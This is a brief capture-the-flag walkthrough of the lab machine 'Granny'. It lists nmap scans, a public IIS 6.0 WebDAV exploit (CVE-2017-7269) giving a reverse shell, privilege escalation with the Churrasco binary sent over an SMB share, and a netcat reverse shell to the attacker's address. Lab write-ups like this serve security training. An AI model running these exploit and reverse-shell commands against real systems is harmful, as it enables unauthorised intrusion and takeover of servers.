Ping
ping 10.10.10.15
Nmap Default Scan
nmap 10.10.10.15 -oN dnmap
Nmap Script and Service scan
nmap 10.10.10.15 -sCV -A -oN snmap
Nmap All Port Scan
nmap 10.10.10.15 -p- --min-rate 10000 -oN anmap
Port 80
Will Search Public Exploit For IIS 6.0
Will use this exploit https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
I have saved the python code in a file named exp.py and ran the exploit
python2 exp.py 10.10.10.15 80 10.10.14.2 80
rlwrap nc -nvlp 80
Got shell.
Will move jump to Privilege escalation…!
Our Privileges
whoami /priv
Systeminfo
looks like there must be some kernel exploit.
Ran exploit suggester
python3 wes.py systeminfo.txt -c
Gonna use this exploit
In exploit-db there is no pre compiled binary, So i found one,
Found the Pre compiled binary:https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
So once downloaded, I have Transferred the binary to target using SMB Share
impacket-smbserver kali .
copy \\10.10.14.2\kali\churrasco.exe
Lets check whether the binary is working or not
churrasco.exe whoami
So No I will transfer nc.exe to the target machine and get a shell as admin
churrasco.exe -d "nc.exe 10.10.14.2 443 -e cmd.exe"
Got reverse shell
rlwrap nc -nvlp 443
Found the location of flags
dir /s /b C:\user.txt
dir /s /b C:\root.txt
Got the flags.
user.txt
root.txt
Done with Granny…:)